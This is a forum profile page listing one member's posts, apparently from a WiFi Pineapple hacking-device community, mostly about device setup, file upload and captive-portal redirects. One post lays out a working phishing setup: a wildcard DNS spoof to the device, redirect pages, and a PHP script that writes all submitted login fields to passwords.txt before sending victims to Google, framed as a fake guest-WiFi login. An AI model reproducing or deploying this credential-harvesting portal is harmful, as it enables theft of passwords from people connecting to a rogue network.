Jump to content

xARCHANGELSx

Active Members
  • Posts

    70
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by xARCHANGELSx

  1. Does anyone know how to change the RedirectURL command after a user has clicked "accept" on the splash page? I want to redirect the user to a certain URL after they clicked "accept" on the splash page. I've tried searching it on google, but no luck. # Parameter: RedirectURL # Default: none # # After authentication, normally a user is redirected # to their initially requested page. # If RedirectURL is set, the user is redirected to this URL instead. # # RedirectURL http://www.ilesansfil.org/ Any ideas? Thanks, X
  2. One more question. I have a simple landing page as the splash page. The user just has to click "accept" and they gain access to the network. Now on the tab "Configure NoDogSplash" there is an option for a RedirectURL: # Parameter: RedirectURL # Default: none # # After authentication, normally a user is redirected # to their initially requested page. # If RedirectURL is set, the user is redirected to this URL instead. # # RedirectURL www.google.ca After they accept, I want them to be redirected to google.com. I tryed setting "Default" to yes, but nothing. Any ideas?
  3. NoDogSplash works great! One small problem, NoDogSplash for some reason does not load my CSS scripts for my login that I created. Now my CSS files worked fine, when they were in "www" folder and my login script loaded up fine on DNSspoof. Anyone have any ideas for this?
  4. I am now using NoDogSplash, just creating my own splash page :) Thanks mreidiv!
  5. Instead of using all the files. I just changed the "DNS SPOOF" index.php in "Configuration" to the main phish page, as seen below. Then I just made the login/pass forms record to a text file on the root pineapple server.
  6. I finally got my pineapple wifi up and running and its great. I tested SSLstrip and I love it, very nice script. Recently I downloaded a phishing zip off the website here, with the following contents: index.html facebook.html twitter.html peets.html error.php redirect.php test.php Now I haved used phishing pages before but the file I am most interested in is "peets.html" its basically a fake "Guest WIFI Login" for users. My only problem is this page does not come up every time you connect to the "Pineapple WIFI" when a browser is opened. Now what I want to achieve here, is to get this phishing page to load every time a user is connected to the wifi when he/she opens a url in the browser. Now my DNS SPOOF is updated in Configuration Settings>DNS Spoof tab: 172.16.42.1 * And my "index.php (Phishing)": <html> <head> <meta http-equiv="REFRESH" content=0;url=redirect.php"> </head> <body> </body> </html> Now in my "www" folder on the Pineapple server I have the following files and their contents: test.php <?php phpinfo(); ?> index.php <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body> </html> redirect.php <?php $ref = $_SERVER['HTTP_REFERER']; require('index2.php'); ?> index2.php Now this is the phish page. This is the page I want to show every time a user is connected to the "Pineapple WIFI" when they first open the browser and enter a url. In order to use the wifi, they must login with a user name and password to use the WIFI. After they login then they will be redirected to "www.google.com" in the "logs.php" file. logs.php (To capture login/pass) <?php $yourpagesource = "https://www.google.com/"; $handle = fopen("passwords.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable."=".$value); } fwrite($handle, "\r\n"); fclose($handle); header('Location: http://google.com/'); exit; ?> Any help would be awesome!!!
  7. The only problem I dont see "Pineapple Facing Adapter" in my Network settings
  8. Currently I have my Pineapple WIFI hooked up to Windows. I successfully logged in using WinSCP and uploading some files on the Pineapple WIFI. The problem now is that on the admin splash page for Example: When I try and see what scripts are available for download in the "Pineapple Bar" tab: Error connecting. Please check your internet connection!
  9. My pineapples firmware was updated with the SIM card before running the setup. My pineapple is currently connected to my MAC OSX(10.9.1) w/ wired LAN connection. *Could the problem be that I need to hook my pineapple to a HUB then connect to my MAC OSX?* Here is my setup for my Ethernet on my MAC OSX: Here a screenshot of the Pineapple's device admin settings: I can connect other devices to my pineapple's WIFI SSID no problem. Also, these solid lights are showing on the pineapple device: Green/Amber/Blue/Red I hope this helps!
  10. Yes I can ping the pineapple ip. "TTL expired in transit" The WinSCP error is Network error: Connection to "172.16.42.1" timed out.
  11. Sorry, I cannot login using the login info above. Unless the IP address is incorrect?
  12. I am having a problem uploading files through the server on WinSCP. I am using the following: Hostname: 172.16.42.1 Username: root Password: My set root password (I also have used "pineapplesareyummy") File Protocol: SCP I am using WinSCP 5.5.1 on Windows 7 Any help would be awesome! Thank You, X
  13. Emailed them last night when I noticed, hopefully they will give me a reponse
  14. Not sure if this is the right sub forum to be asking this, feel free to move :) Can anyone tell me if my package is stuck at customs? Screenshot: http://i42.tinypic.com/33vlwdf.jpg Thank you, X
  15. My name is Darren aka W1NK1LL3E Z Favourite game: Shadow Run, Sega Favourite OS: OSX Favourite console: N64 Nationality: Canada Accent: Generic Sex: Male Age: 26 Race: White Height: 6FT Status: Build: Favourite band: A7X Favourite book: The Dirt Favourite author: n/a Favourite movie: Terminator 2 Favourite director: Martin Scorsaze Favourite TV Show: n/a Favourite actor: Matt Damon Favourite actress: Natalie Portman Favourite Pinup: n/a Favourite Comedian: Dave Chapelle Other hobbies: WOrking out Car: 2012 dodge challenger Occupation: n/a
×
×
  • Create New...